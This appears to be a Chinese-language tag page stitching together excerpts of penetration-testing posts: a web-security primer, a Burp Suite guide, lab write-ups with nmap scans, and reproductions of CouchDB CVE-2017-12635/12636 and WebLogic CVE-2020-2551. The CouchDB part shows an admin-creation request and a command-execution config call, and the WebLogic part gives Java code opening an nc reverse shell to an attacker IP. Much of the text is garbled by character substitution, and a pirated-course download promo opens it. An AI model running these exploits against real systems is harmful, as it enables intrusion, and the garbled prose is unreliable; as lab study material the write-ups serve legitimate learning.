渗透测试

Web平安浸透测试 把握绝大多数Web破绽原理及攻防伎俩download：3w zxit666 comWeb平安：爱护您的网站免受攻打在明天的数字时代，Web平安是任何在线业务胜利的要害。从小型企业到大型公司，所有人都须要留神并采取措施来爱护他们的网站免受黑客和恶意软件的攻打。 在这篇文章中，咱们将探讨如何爱护您的网站免受攻打，并提供一些常见的Web平安威逼及其解决方案。 常见的Web平安威逼SQL注入攻打SQL注入攻打是指黑客通过输出无害的代码来获取数据库中的敏感信息。这可能导致数据库解体或受到损坏，并且很容易影响整个网站。 解决方案：应用参数化查问或存储过程来代替原始SQL查问，限度用户输出的长度和字符类型，并禁用谬误音讯显示。 XSS攻打跨站点脚本攻打（XSS）是指黑客通过向网站注入JavaScript或其余脚本来攻打用户。这能够导致用户被诱骗进入歹意站点，或泄露他们的个人信息。 解决方案：应用输出验证和输入编码来避免XSS攻打，对用户输出进行严格限度，应用HTTP-only Cookie和CSP策略。 CSRF攻打跨站点申请伪造（CSRF）是指黑客通过利用用户登录状态，以用户身份提交歹意申请，例如更改明码或转移资金。这可能导致用户失去他们的账户、资产或个人信息。 解决方案：应用CSRF令牌来验证用户申请，限度对敏感申请的拜访权限，并严格控制Cookie标记。 Web平安实际除了采取针对特定威逼的解决方案以外，还能够采取以下措施来确保您的网站平安： 增强明码和访问控制确保您的服务器和数据库明码是强明码，定期更换明码，并为管理员和用户调配不同的拜访权限。 更新软件和补丁定期更新您的Web服务器、应用程序和操作系统，并及时装置最新的安全补丁和更新，以缩小破绽的危险。 应用SSL证书应用SSL证书加密您的网站流量，包含用户数据和敏感信息的传输，这有助于避免中间人攻打和窃听。 监测和记录日志应用网络安全监督工具来监测您的网站流动，及时发现异常行为，并建设残缺的平安日志记录体系。 培训员工培训您的员工如何避免钓鱼和其余网络攻击，以及如何辨认和报告安全事件。 在Web平安中，预防胜于医治。通过采取上述措施来爱护您的网站免受攻打，并及时更新和保护安全策略和防御机制，您能够为您的用户提供平安的在线环境，并确保您的业务胜利。

target在浸透攻防中的利用能够用来收集指标站点的更多资产能够探测一些主动加载的接口、内容等，有的内容并不能被访问者间接看见，通过抓包的形式就能够高深莫测。 1栏中是流量信息，其中蕴含着你所申请的流量2栏中是对1栏中内容的一个开展目录3栏中是重要信息，其中蕴含一些破绽信息（不过根本没什么用）灰色和蓝色代表失常，红色代表有问题4栏中是对3栏中内容的具体介绍5栏和6栏中是申请数据包和应答数据包的内容Site map过滤器应用只显示合乎Scope规定配置的申请：点击Site map上方的过滤器，勾选Show only in-scope items并保留从所有的URL中筛选带有参数的网址,以便于实现代码层面的攻打,如SQL注入等：勾选Show only parameterized requests通过关键字搜寻过滤，如以下搜寻loginscope 功能模块详解Target Scope中作用域的定义比拟宽泛，通常来说，当咱们对某个产品进行浸透测试时，能够通过域名或者主机名去限度拦挡内容，这里域名或主机名就是咱们说的作用域；如果咱们想限度得更细一点，比方，你只想拦挡login目录下的所有申请，这时咱们也能够在此设置，此时作用域就是目录。总体来说，Target Scope次要应用于上面几种场景中：限度Site map和Proxy 历史中的显示后果 通知Burp Proxy 拦挡哪些申请通知Burp Spider抓取哪些内容通知Burp Scanner主动扫描哪些作用域的安全漏洞在Burp Intruder和Burp Repeater 中指定URL简略来说，通过Target Scope 咱们能不便地管制Burp 的拦挡范畴、操作对象，缩小有效的乐音。在Target Scope的设置中，次要蕴含两局部性能：蕴含规定和去除规定。在蕴含规定中的，则认为须要拦挡解决，会显示在Site map中；而在去除规定里的，则不会被拦挡，也不会显示在Site map里 Incude in scope 定义范畴内规定exclude from scope 定义排除范畴内规定浸透测试过程中，能够通过域名或者主机名去限度拦挡内容，如果想细粒度化，比方只想拦挡login目录下的所有申请，此时的作用域就是目录场景： 1、限度站点地图和proxy历史中的显示后果2、通知Burp proxy 拦挡哪些申请3、burp spider抓取哪些内容4、burp scanner主动扫描哪些作用域的安全漏洞5、在burp Intruder和Burp Repeater中指定URL在Target Scope的设置中，次要蕴含两局部性能：蕴含规定和去除规定。在蕴含规定中的，则认为须要拦挡解决，会显示在Site map中；而在去除规定里的，则不会被拦挡，也不会显示在Site map里。 需注意，要勾选应用高级配置Use advanced scope control，此时才可从协定、域名/IP、端口、文件名4个维度去配置规定。实战案例一：只想查看某个网站的信息。在Site map中，抉择该网站，右键Add to scope；这时，会主动将该网站转换成正则表达式增加进Scope的蕴含规定里点击Site map上方的过滤器，勾选Show only in-scope items并保留，这是Site map就只会显示抉择的网站了四、Issue definitions破绽列表，即列出了BurpSuite能够扫描到的破绽详情。 对某个数据包进行被动扫描：右键URL，点击Do passive scan导出扫描报告：在Site map中右键网站：Issue—>Report issues for this host

前言CouchDB 是一个开源的面向文档的数据库管理系统，能够通过 RESTful JavaScript Object Notation (JSON) API 拜访。CVE-2017-12635是因为Erlang和JavaScript对JSON解析形式的不同，导致语句执行产生差异性导致的。这个破绽能够让任意用户创立管理员，属于垂直权限绕过破绽。 CVE-2017-12636是一个任意命令执行破绽，咱们能够通过config api批改couchdb的配置query_server，这个配置项在设计、执行view的时候将被运行。影响版本： 小于 1.7.0 以及小于 2.1.1破绽复现环境搭建应用Vulhub的破绽平台进行复现docker-compose up -d拜访http://192.168.52.128:5984/_u...呈现如下页面搭建胜利 测试过程CVE-2017-12635结构创立账户的PUT包 PUT /_users/org.couchdb.user:liangban HTTP/1.1Host: www.0-sec.org:5984Accept: /Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/jsonContent-Length: 104 {   "type": "user",   "name": "liangban",   "roles": ["_admin"],   "password": "liangban" }咱们没有admin权限，所以报错forbidden显示只有管理员能力设置Role角色。绕过role验证：发送蕴含两个roles的数据包，即可绕过限度在原先的包中退出 "roles":[],返回如图所示即胜利创立用户尝试应用liangban/liangban登录：胜利登录，且为管理员账户 CVE-2017-12636该破绽利用条件须要登录管理员用户触发，可应用下面介绍的CVE-2017-12635搭配利用 因为Couchdb 2.x和和1.x的的API接口有所差异，导致利用形式也不同，这里间接拿刚刚复现的CVE-2017-12635环境，演示2.x版本 Couchdb 2.x 引入了集群，所以批改配置的API须要减少node name,带上账号密码拜访/_membership获取node名称：其中liangban:liangban为管理员的账户明码 curl http://liangban:liangban@192.168.52.128:5984/_membership这里只有一个node，为：nonode@nohost批改nonode@nohost的配置,其中id >/tmp/success是要执行的命令，能够更换为弹shell curl -X PUT http://liangban:liangban@192.168.52.128:5984/_node/nonode@nohost/_config/query_servers/cmd -d '"id >/tmp/success"'申请增加一个名为zhuAn的Database，以便在外面执行查问curl -X PUT 'http://liangban:liangban@192....'申请增加一个名为test的Document，以便在外面执行查问 ...

前言2020年1月15日,Oracle公布了一系列的安全补丁,其中Oracle WebLogic Server产品有高危破绽,破绽编号CVE-2020-2551,CVSS评分9.8分,破绽利用难度低,可基于IIOP协定执行近程代码。通过剖析这次破绽次要起因是谬误的过滤JtaTransactionManager类，JtaTransactionManager父类AbstractPlatformTransactionManager在之前的补丁外面就退出到黑名单列表了,T3协定应用的是resolveClass办法去过滤的,resolveClass办法是会读取父类的,所以T3协定这样过滤是没问题的。然而IIOP协定这块,尽管也是应用的这个黑名单列表,但不是应用resolveClass办法去判断的,这样默认只会判断本类的类名,而JtaTransactionManager类是不在黑名单列表外面的,它的父类才在黑名单列表外面,这样就能够反序列化JtaTransactionManager类了,而JtaTransactionManager类是存在jndi注入的。 环境搭建间接应用vulhub中的CVE-2017-10271就能够应用git克隆到本地git clone https://github.com/vulhub/vul...进入对应环境cd vulhub/weblogic/CVE-2017-10271 启动docker破绽环境sudo docker-compose up -d搭建实现当前，拜访7001/console如下图所示即为搭建胜利 检测是否存在破绽python3 CVE-2020-2551.py -u http://192.168.52.128:7001/发现存在破绽 破绽利用攻击机ip：192.168.0.101靶机ip：192.168.52.128攻击机开启监听nc -lvnp 3333编写一个exp.java文件： import java.io.IOException;public class exp {        static{                try {                        java.lang.Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","nc -e /bin/bash 192.168.0.101 3333"});               } catch (IOException e) {                         e.printStackTrace();               }       }        public static void main(String[] args) {       }} ...

什么是浸透测试？浸透测试（Penetration Test，简称为 PenTest），是指通过尝试利用破绽攻打来评估IT基础设施的安全性。这些破绽可能存在于操作系统、服务和应用程序的缺点、不当配置或有危险的用户行为中。这种评估也有助于验证防御机制的有效性以及最终用户是否恪守平安政策。 浸透测试通常应用手动或主动技术来系统地毁坏服务器、端点、网络应用、无线网络、网络设备、挪动设施和其余潜在的裸露点。一旦某个零碎的破绽被胜利利用，测试人员会尝试利用被毁坏的零碎持续攻打其余外部资源，特地是，会通过权限降级逐渐获取更高级别的平安许可和对电子虚构资产和信息的更深刻拜访。 通过浸透测试胜利裸露的任何安全漏洞信息通常会被汇总提交给 IT 和网络系统经理，以帮忙这些专业人士做出战略性论断并调整修复工作的优先级。浸透测试的基本目标是掂量零碎或终端客户被毁坏的可能性，并评估此类事件可能对相干资源或操作产生的任何结果。 把浸透测试看成是试图通过本人入手来确认是否有人能闯入你的房子可能更好了解。浸透测试人员也被称为道德黑客，应用受控环境评估IT基础设施的安全性，以平安地攻打、辨认和利用破绽。区别在于他们不是查看门窗，而是测试服务器、网络、网络应用程序、挪动设施和其余潜在的突破口，以发现整套零碎的弱点。  浸透测试的5个阶段浸透测试的整体流程能够分为5个阶段：布局和侦察、扫描、获取拜访权限、维持拜访权限、剖析。 1、 布局和侦察第一阶段次要蕴含以下两个内容： 定义测试的指标和范畴，包含要解决的零碎和要应用的测试方法收集情报（例如，网络和域名、邮件服务器）以更好地理解指标的工作形式及其潜在破绽 2、 扫描浸透测试人员会应用工具来检测指标网站或零碎的弱点，包含凋谢的服务、利用平安问题以及开源破绽。浸透测试人员依据他们在侦察和测试期间发现的内容应用各种工具。通常蕴含以下两类工具： 动态剖析：查看应用程序的代码，以预估它在运行时的行为形式。这类工具能够一次性扫描整个代码。动态分析：在运行状态下查看利用程序代码。这是一种更理论的扫描形式，因为它能够实时查看应用程序的性能。 3、 获取拜访权限攻击者的动机可能包含窃取、更改或删除数据，转移资金或是侵害公司名誉等。因而，这一阶段会应用网络应用攻打，例如跨站脚本攻打、SQL注入和后门等攻击方式，以发现指标破绽。浸透测试人员会确定最合适的工具和技术来取得对系统的拜访，而后利用这些破绽，以理解她们可能造成的侵害。  4、 维持拜访这一阶段的指标是看这些破绽是否能够在指标零碎中保持足够长的工夫以达成攻击者的目标。这是为了模仿简单的持续性威逼，这些威逼通常在零碎中停留数月以窃取企业中最敏感的数据。  5、 剖析浸透测试的后果随后会汇编成一份报告，蕴含以下内容： 被利用的具体破绽被拜访的敏感数据浸透测试人员可能留在零碎中而不被发现的工夫平安人员对这些信息进行剖析，以帮忙配置企业的WAF设置和其余利用平安解决方案，以修补破绽和阻止将来可能产生的攻打。  应该授予浸透测试人员多少权限？依据浸透测试的指标，测试人员可能获取不同等级的信息或是指标零碎的拜访权限。在某些状况下，浸透测试团队会在开始时采取某种办法并始终坚持下去。其余时候，随着浸透测试期间对系统意识的深刻，测试团队也会迭代其测试策略。因而，有3个档次的浸透测试拜访权限： Opaque Box：测试团队对指标零碎的内部结构毫无理解。他们须要像黑客一样行事，探测能够从内部利用的任何弱点。Semi-opaque Box：团队把握了一套或多套凭证。并且晓得指标的外部数据结构、代码和算法。浸透测试人员可能会依据具体的设计文件，如指标零碎的架构图，设计测试计划。Transparent Box：浸透测试人员领有拜访零碎、零碎组件（包含源代码、二进制、容器和其余运行在该零碎上的服务器）的权限。这种办法能够在最短的工夫内为指标零碎提供最高级别的保障。 浸透测试的类型全面的浸透测试对于优化风险管理至关重要，这须要测试你所在环境中的所有区域： Web App：测试人员检测安全控制的效率并查找暗藏的破绽、攻打模式以及其余导致 Web App 被毁坏的潜在平安缺口。 挪动利用：利用自动化和扩大的手动测试，测试人员能够寻找在挪动设施上运行的应用程序二进制文件和相应的服务器端性能的破绽。服务器端的破绽包含会话治理、加密问题、认证和受权问题以及其余常见的网络服务破绽。 网络：这种测试能够确定内部网络和零碎中的常见破绽和要害破绽。专家们会设置一个检查表，其中包含加密传输协定、SSL证书范畴问题、治理服务的应用等测试用例。 云：云环境与传统本地环境存在微小的差别。通常状况下，平安责任是由应用环境的企业和云服务提供商独特承当。正因为如此，浸透测试须要一套专门的技能和教训来仔细检查云的各个环节，如配置、API、各种数据库、加密形式、存储和安全控制。 容器：从 Docker 取得的容器往往存在破绽，并且能够被大规模利用。谬误配置也是与容器及其环境相干的常见危险。以上这两种危险都能够通过业余的浸透测试发现。 嵌入式设施（IoT）：嵌入式或物联网设施（如医疗设施、汽车、智能家居、智能手表等）因为其较长的应用周期、电源限度、监管要求以及地位扩散等个性，须要独特的软件测试办法。专家们在进行彻底的通信剖析的同时，还须要进行客户端/服务器剖析，以确定在相干应用场景中是否会呈现破绽。 API：采纳主动和手动测试技术力求笼罩 QWASP API 平安 Top 10 名单。测试人员寻找的一些平安危险和破绽包含 Broken Object Level Authorization（BOLA）、用户认证、适度的数据裸露、不足资源/速率限度等等。 CI/CD 流水线：古代 DevSecOps 实际将自动化和智能代码扫描工具整合到 CI/CD 流水线中。除了发现已知破绽的动态工具外，主动浸透测试工具也能够被集成到 CI/CD 流水线中，以模仿黑客的行为形式来毁坏应用程序的平安。自动化的 CI/CD 浸透测试能够发现暗藏的破绽和攻打模式，这些破绽和攻打模式在动态代码扫描中是无奈发现的。 为什么浸透测试如此重要？辨认并对平安危险进行优先排序浸透测试评估了企业爱护其网络、应用程序、端点和用户的能力，以避免内部或外部试图躲避安全策略来取得对敏感数据的拜访。  智能治理破绽浸透测试会向企业提供对于可利用的平安威逼的理论信息。通过执行浸透测试，你能够被动辨认哪些破绽是致命的，哪些是不太重要的，哪些是假阳性。这使你的组织可能更明智地确定补救措施的无限秩序、利用所需的安全补丁，并更无效地调配平安资源，以确保它们施展最大劣势。  辨认现有的平安我的项目是否在失常运行没有对整个环境的适当可见性就贸然扭转安全策略可能会导致你所解决的平安问题都是一些本质上不会造成任何挫伤的问题。浸透测试不仅能通知你组件是否在失常运行，它们还能够进行质量检查，所以通过浸透测试你也会发现什么策略是最无效的，什么工具能够提供最高的投资回报率。  合乎监管要求浸透测试帮忙企业解决审计和合规性问题。通过利用企业的基础设施，浸透测试能够精确地证实攻击者是如何取得敏感数据的。随着攻打策略的倒退和演变，定期的强制测试能够确保企业在破绽被利用之前发现并修复平安弱点，从而当先一步。 此外，对于审计人员来说，这些测试还能够验证其余规定的安全措施是否到位或者失常工作。浸透测试所生成的具体报告还能够帮忙企业阐明其在保护所需的安全控制方面做出了渎职的工作。

IP地址IP地址的基本概念、IP段划分、什么是A段、B段、C段等Internet Protocol AddressIP地址时指互联网协议地址，是IP协定提供的一种对立的地址格局，它为互联网上的每一个网络和每一台主机调配一个逻辑地址的差别。 IP地址时一个32位的二进制数，通常被宰割为4个“8位二进制数”（也就是四个字节）。IP地址通常用“点分十进制”示意成（a.b.c.d)的模式，其中，a,b,c,d都是0-255之间的十进制整数。 广域网Wide Area Network又称外网、公网是连贯不同地区局域网或城域网计算机通信的远程网。通常跨接很大的物理范畴，能连贯多个国家、地区或横跨几个洲并提供远距离通信，造成国际性的近程网络。广域网不等同于互联网 局域网Local Area Network局域网是一个可连贯住宅、学校、试验等等优先区域计算机的计算机网络。相比之下，广域网不仅笼罩较大的激励间隔，而且通常设计固接专线和对于互联网的链接。相比来说，互联网则更为广大，是连贯寰球商业和集体计算机的零碎。 端口Port计算机端口，能够认为是计算机与外界通信交换的进口。 端口的分类公认端口Well Known Ports从0到1023他们严密绑定与一些服务通常这些端口的通信明确表明了某种服务的协定例如：80端口实际上总是HTTP通信等 注册端口Registered Ports从1024到49151调配给用户过程或应用程序这些过程次要是用户抉择装置的一些应用程序，而不是曾经调配好了公认端口的罕用程序。这些端口在没有被服务器资源占用的时候 动静/公有端口Dynamic and/or Private Ports

浸透测试之红包激励模块逻辑破绽测试总结下图是本次App逻辑破绽测试集体总结的领导准则和测试方法，领导准则前面对应的是发现的破绽，有些破绽形容做了脱敏泛化解决，依据这些破绽根本能够反推出测试用例。这些是自己认为App逻辑破绽测试应该重点关注的，可能不全，如有补充欢送探讨（其余sql注入、XSS等其余类型破绽不是本次测试的重点，测试的对象App，另外看了后端代码都是用的orm框架个别也没有什么问题）。 背景公司不同App产品线的红包激励模块曾好几次被破解，呈现过几次针对我司产品的autojs破解协定apk，自己作为风控部门业余做逆向的技术人员，曾逆向剖析过这些黑产app，大部分都是抓包获取用户token后间接发包获取处分，绕过看广告、做工作等环节。而本次工作的次要目标就是主动出击，对公司外围产品的红包激励模块进行逻辑破绽测试，看是否有容易被薅羊毛的的逻辑破绽，对发现的破绽督促业务线进行整改。尽管自己始终做的逆向方向的，但也长期关注平安相干的其余畛域，对浸透测试的办法和工具等也是近朱者赤;近墨者黑。本文次要是做自己本次所做浸透的测试简要总结。 浸透测试要点总结浸透测试和代码审计相辅相成通常须要编写burpsuite插件实现主动sign计算，这样在批改参数重放或并发测试时不须要关怀sign计算问题，再评估完sign算法爱护强度后，能够间接看代码算法实现，而不须要齐全逆向还原能够进步测试效率。很多破绽，如并发破绽等是能够通过代码审计一眼看进去的，不须要齐全黑盒测试，这也能够极大进步测试效率。当然也有因为对代码逻辑不熟或代码逻辑过于简单，导致看代码还不是间接黑盒测试来的快得状况。集体感觉两者是相辅相成的。竞争/并发破绽服务端对客户端申请都是并发解决的，而且很多服务端还有负载平衡多节点解决，这样当对数据库某字段进行加减操作（如红包发放）如果没有加锁就会导致竞争/并发破绽，分布式锁个别用数据库锁或redis锁。做好提现最初关卡审核本次测试的一个重点就是看是否齐全脱离app间接通过发包就能够实现提现的，教训证在有提现微信账号openid的前提下是能够全程脱离APP通过发包实现提现1元到账的。但微信的openid是跟app绑定的，不同app对应的openid不同，须要获取微信的openid，须要调⽤微信受权登录接⼝来获取，并且调⽤时会校验调⽤⽅app的签名，若app的签名与后盾配置的签名不⼀致，⽆法胜利调⽤，试过各种签名坑骗未失效，预计不是在app内校验签名的而是在微信里校验的，⽬前openid是抓包获取的。设想一下如果能够齐全脱离app就能够全程发包获取处分并提现（如领取号手机号间接提现），那么即便限度了每个账号的提现次数那也是很恐怖的。比方开发一个在线的薅羊毛工具，而后到处流传，每个人只有扫个码或者填个手机号就能够提现一元，流传量大也很恐怖。解决办法就是当时在app内做好各个用户行为的埋点数据和用户环境检测数据等，而后在提现重要关卡验证这些数据是否失常，不失常就回绝提现。 burpsuite脚本对于如何应用burpsuite来进行测试，看官网帮忙文档或网上材料根本就能学会这边就不开展细说，附上解决过burpsuite插件脚本供参考。 # -*- coding: utf-8 -*-from burp import IBurpExtenderfrom burp import IHttpListenerfrom burp import IRequestInfofrom burp import IParameterfrom burp import IBurpExtenderCallbacksfrom java.io import PrintWriterimport base64from hashlib import md5import timeHOST_FROM = "yy.xx.com"# https://portswigger.net/burp/extender/api/index.htmlclass BurpExtender(IBurpExtender, IHttpListener): # # implement IBurpExtender # def registerExtenderCallbacks(self, callbacks): # obtain an extension helpers object self._helpers = callbacks.getHelpers() self._stdout = PrintWriter(callbacks.getStdout(), True) # set our extension name callbacks.setExtensionName("zz resign plugin") # register ourselves as an HTTP listener callbacks.registerHttpListener(self) # # implement IHttpListener # def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo): # only process requests if not messageIsRequest: return # get the HTTP service for the request httpService = messageInfo.getHttpService() # only process the host that is HOST_FROM if (HOST_FROM != httpService.getHost()): return # self._stdout.println(toolFlag) # self._stdout.println(IBurpExtenderCallbacks.TOOL_REPEATER) if (IBurpExtenderCallbacks.TOOL_REPEATER != toolFlag) or (IBurpExtenderCallbacks.TOOL_INTRUDER != toolFlag): return requestInfo = self._helpers.analyzeRequest(messageInfo) path = requestInfo.getUrl().getPath() self._stdout.println("path=%s" % path) if not path.startswith("/xx/"): return self.resign(messageInfo, check_sign=False) def resign(self, messageInfo, check_sign=False): requestInfo = self._helpers.analyzeRequest(messageInfo) method = requestInfo.getMethod() # self._stdout.println("method=%s" % method) path = requestInfo.getUrl().getPath() # self._stdout.println("path=%s" % path) parameters = requestInfo.getParameters() body_offset = requestInfo.getBodyOffset() url_param_dist = {} for param in parameters: if IParameter.PARAM_URL == param.getType(): k = param.getName() v = param.getValue() v = self._helpers.urlDecode(v) # 须要转化一下有些%号没有decode，签名算法是谬误的 self._stdout.println("%s=%s" % (k, v)) # ... request = messageInfo.getRequest() body = request[body_offset:] body = self._helpers.bytesToString(body) self._stdout.println("body=%s" % body) s = '{}-{}'.format(method, path) # params old_sign = "" new_time_sign = None new_ts = str(int(time.time())) if not check_sign: url_param_dist["_ts"] = new_ts #更新工夫戳 if "XX" in url_param_dist: s = str(url_param_dist["XX"]) + time.strftime('%Y%m%d') new_time_sign = md5(s.encode()).hexdigest() url_param_dist["sign"] = new_time_sign #更新sign arguments = url_param_dist keys = list(arguments.keys()) keys.sort() for k in keys: if k == '_sign': old_sign = arguments[k] continue val = arguments[k] if type(val) == str or type(val) == unicode or type(val) == int: s += '&{}={}'.format(k, val) elif type(val) == list: for v in val: s += '&{}={}'.format(k, v) else: self._stdout.println('params unknown type:{}, key:{}'.format(type(val), k)) return # json body s += '&json={}'.format(body or '') digest = md5(s.encode()).hexdigest() new_sign = base64.urlsafe_b64encode(digest)[:-2] # self._stdout.println('new_sign:{}, old_sign:{}'.format(new_sign, old_sign)) request = self._helpers.urlDecode(request) if not check_sign: new_request = self._helpers.updateParameter(request, self._helpers.buildParameter("ts", new_ts, IParameter.PARAM_URL)) new_request = self._helpers.updateParameter(new_request, self._helpers.buildParameter("_sign", new_sign, IParameter.PARAM_URL)) if new_time_sign: new_request = self._helpers.updateParameter(new_request, self._helpers.buildParameter("sign", new_time_sign, IParameter.PARAM_URL)) # self._stdout.println(self._helpers.bytesToString(new_request)) messageInfo.setRequest(new_request) else: if new_sign != old_sign: self._stdout.println("error! new_sign != old_sign") else: self._stdout.println("success! new_sign == old_sign") # messageInfo.setHttpService(self._helpers.buildHttpService(HOST_TO, # httpService.getPort(), httpService.getProtocol()))

服务探测端口探测 root@ip-10-10-208-107:~# nmap -p- 10.10.59.205 --openStarting Nmap 7.60 ( https://nmap.org ) at 2022-03-04 02:48 GMTNmap scan report for ip-10-10-248-133.eu-west-1.compute.internal (10.10.59.205)Host is up (0.0039s latency).Not shown: 61918 closed ports, 3588 filtered portsSome closed ports may be reported as filtered due to --defeat-rst-ratelimitPORT STATE SERVICE53/tcp open domain80/tcp open http88/tcp open kerberos-sec135/tcp open msrpc139/tcp open netbios-ssn389/tcp open ldap445/tcp open microsoft-ds464/tcp open kpasswd5593/tcp open http-rpc-epmap636/tcp open ldapssl3268/tcp open globalcatLDAP3269/tcp open globalcatLDAPssl3389/tcp open ms-wbt-server5357/tcp open wsdapi5985/tcp open wsman7990/tcp open unknown9389/tcp open adws47001/tcp open winrm49664/tcp open unknown49665/tcp open unknown49666/tcp open unknown49668/tcp open unknown49669/tcp open unknown49670/tcp open unknown49671/tcp open unknown49673/tcp open unknown服务探测 ...

免责申明本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用，请不要将文中应用的工具和浸透思路用于任何非法用处，对此产生的所有结果，自己不承当任何责任，也不对造成的任何误用或侵害负责。服务探测┌──(rootkali)-[~/tryhackme/RazorBlack]└─# nmap -sV -Pn 10.10.246.107 Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-02 01:48 ESTNmap scan report for 10.10.246.107 Host is up (0.23s latency).Not shown: 986 closed tcp ports (reset)PORT STATE SERVICE VERSION53/tcp open domain Simple DNS Plus88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-03-02 06:49:52Z)111/tcp open rpcbind 2-4 (RPC #100000)135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: raz0rblack.thm, Site: Default-First-Site-Name)445/tcp open microsoft-ds?464/tcp open kpasswd5?593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0636/tcp open tcpwrapped2049/tcp open mountd 1-3 (RPC #100005)3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: raz0rblack.thm, Site: Default-First-Site-Name)3269/tcp open tcpwrapped3389/tcp open ms-wbt-server Microsoft Terminal ServicesService Info: Host: HAVEN-DC; OS: Windows; CPE: cpe:/o:microsoft:windowsService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 252.05 seconds枚举enum4linux,域名应该是RAZ0RBLACK.thm ...

免责申明本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用，请不要将文中应用的工具和浸透思路用于任何非法用处，对此产生的所有结果，自己不承当任何责任，也不对造成的任何误用或侵害负责服务探测┌──(rootkali)-[~/htb/Armageddon]└─# nmap -p- 10.10.10.233 --open -PnStarting Nmap 7.92 ( https://nmap.org ) at 2022-01-25 02:37 ESTNmap scan report for 10.10.10.233Host is up (0.25s latency).Not shown: 65533 closed tcp ports (reset)PORT STATE SERVICE22/tcp open ssh80/tcp open httpNmap done: 1 IP address (1 host up) scanned in 78.51 seconds ┌──(rootkali)-[~/htb/Armageddon]└─# nmap -sV -Pn 10.10.10.233 -p 22,80 Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-25 02:39 ESTNmap scan report for 10.10.10.233Host is up (0.25s latency).PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.4 (protocol 2.0)80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 10.83 secondsweb只凋谢了两个端口，先查看http服务有什么文件信息 ...

免责申明本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用，请不要将文中应用的工具和浸透思路用于任何非法用处，对此产生的所有结果，自己不承当任何责任，也不对造成的任何误用或侵害负责。服务探测┌──(rootkali)-[~/htb/Explore]└─# nmap -p- 10.10.10.247 --open Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-25 00:43 ESTNmap scan report for 10.10.10.247Host is up (0.25s latency).Not shown: 65530 closed tcp ports (reset), 1 filtered tcp port (no-response)Some closed ports may be reported as filtered due to --defeat-rst-ratelimitPORT STATE SERVICE2222/tcp open EtherNetIP-138185/tcp open unknown42135/tcp open unknown59777/tcp open unknownNmap done: 1 IP address (1 host up) scanned in 89.34 seconds┌──(rootkali)-[~/htb/Explore]└─# nmap -sV -Pn 10.10.10.247 -p 2222,38185,42135,59777 1 ⨯Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-25 00:47 ESTNmap scan report for 10.10.10.247Host is up (0.24s latency).PORT STATE SERVICE VERSION2222/tcp open ssh (protocol 2.0)38185/tcp open unknown42135/tcp open http ES File Explorer Name Response httpd59777/tcp open http Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older任意文件读取搜寻42135端口服务破绽，存在一个任意文件读取破绽 ...

免责申明本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用，请不要将文中应用的工具和浸透思路用于任何非法用处，对此产生的所有结果，自己不承当任何责任，也不对造成的任何误用或侵害负责服务探测凋谢端口探测 ┌──(rootkali)-[~/htb/Love]└─# nmap -p- 10.10.10.239 --open 130 ⨯Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-10 08:49 ESTNmap scan report for 10.10.10.239Host is up (0.38s latency).Not shown: 64817 closed tcp ports (reset), 699 filtered tcp ports (no-response)Some closed ports may be reported as filtered due to --defeat-rst-ratelimitPORT STATE SERVICE80/tcp open http135/tcp open msrpc139/tcp open netbios-ssn443/tcp open https445/tcp open microsoft-ds3306/tcp open mysql5000/tcp open upnp5040/tcp open unknown5985/tcp open wsman5986/tcp open wsmans7680/tcp open pando-pub47001/tcp open winrm49664/tcp open unknown49665/tcp open unknown49666/tcp open unknown49667/tcp open unknown49668/tcp open unknown49669/tcp open unknown49670/tcp open unknownNmap done: 1 IP address (1 host up) scanned in 188.90 seconds端口详细信息 ...

免责申明本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用，请不要将文中应用的工具和浸透思路用于任何非法用处，对此产生的所有结果，自己不承当任何责任，也不对造成的任何误用或侵害负责服务探测┌──(rootkali)-[~/pg/PwnLab]└─# nmap -p- 192.168.151.29 --open Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-17 07:50 ESTNmap scan report for 192.168.151.29Host is up (0.22s latency).Not shown: 65257 closed ports, 274 filtered portsSome closed ports may be reported as filtered due to --defeat-rst-ratelimitPORT STATE SERVICE80/tcp open http111/tcp open rpcbind3306/tcp open mysql53955/tcp open unknownNmap done: 1 IP address (1 host up) scanned in 94.55 seconds ┌──(rootkali)-[~/pg/PwnLab]└─# nmap -sV -T5 -A -O 192.168.151.29 -p 80,111,3306,53955Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-17 07:52 ESTNmap scan report for 192.168.151.29Host is up (0.23s latency).PORT STATE SERVICE VERSION80/tcp open http Apache httpd 2.4.10 ((Debian))|_http-server-header: Apache/2.4.10 (Debian)|_http-title: PwnLab Intranet Image Hosting111/tcp open rpcbind 2-4 (RPC #100000)| rpcinfo: | program version port/proto service| 100000 2,3,4 111/tcp rpcbind| 100000 2,3,4 111/udp rpcbind| 100000 3,4 111/tcp6 rpcbind| 100000 3,4 111/udp6 rpcbind| 100024 1 35282/udp status| 100024 1 43712/tcp6 status| 100024 1 47161/udp6 status|_ 100024 1 53955/tcp status3306/tcp open mysql MySQL 5.5.47-0+deb8u1| mysql-info: | Protocol: 10| Version: 5.5.47-0+deb8u1| Thread ID: 38| Capabilities flags: 63487| Some Capabilities: DontAllowDatabaseTableColumn, ODBCClient, 